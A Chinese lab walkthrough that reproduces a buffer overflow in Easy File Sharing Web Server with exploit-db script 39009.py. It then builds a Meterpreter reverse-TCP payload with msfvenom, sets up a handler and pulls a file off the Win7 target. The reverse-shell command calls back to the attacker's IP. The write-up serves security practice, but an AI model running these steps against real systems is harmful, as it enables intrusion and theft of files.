Easy File Sharing Web Server漏洞复现任务和Metasploit应用

实验环境:

                win7靶机,kali

              一  Easy File Sharing Web Server漏洞复现任务

首先在win7的靶机上配置好Easy File Sharing Web Server,打开之后如下图

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第1张图片

直接点击Try it!进去之后点击start开始运行

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第2张图片

接着到kali上使用nmap进行扫描,发现ip为192.168.23.130的主机存活

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第3张图片

接着使用nmap -sV 192.168.23.132对靶机进行扫描(这里是132的原因是我重启了一下靶机ip地址发生了改变),此时发现80端口的服务版本是Easy File Sharing Web Server

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第4张图片

接着使用searchsploit easy file sharing命令查找该服务中的渗透模块

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第5张图片

这里使用的是HEAD Request Buffer Overflow漏洞(缓冲区溢出漏洞),查看该漏洞的路径,使用python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 目标ip 80进行攻击

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第6张图片

接着回到靶机,发现计算器被打开了,并且Easy File Sharing Web Server停止工作,复现完毕。

二  Metasploit应用

在kali中输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.23.128 lport=5000 -f exe -o /home/kali/Desktop/payload.exe,在kali本地桌面生成一个payload,

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第7张图片

接着将payload放到靶机上

接着使用msfconsole打开metasploit控制端,设置参数

set payload windows/meterpreter/reverse_tcp

set lhost 攻击者的ip

set lport 5000

exploit

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第8张图片

靶机双击payload文件后,就可以在metasploit上使用命令

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第9张图片

尝试将桌面上1.txt的文件下载下来

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第10张图片

可以看到文件已经被下到kali中了

Easy File Sharing Web Server漏洞复现任务和Metasploit应用_第11张图片

你可能感兴趣的:(学习)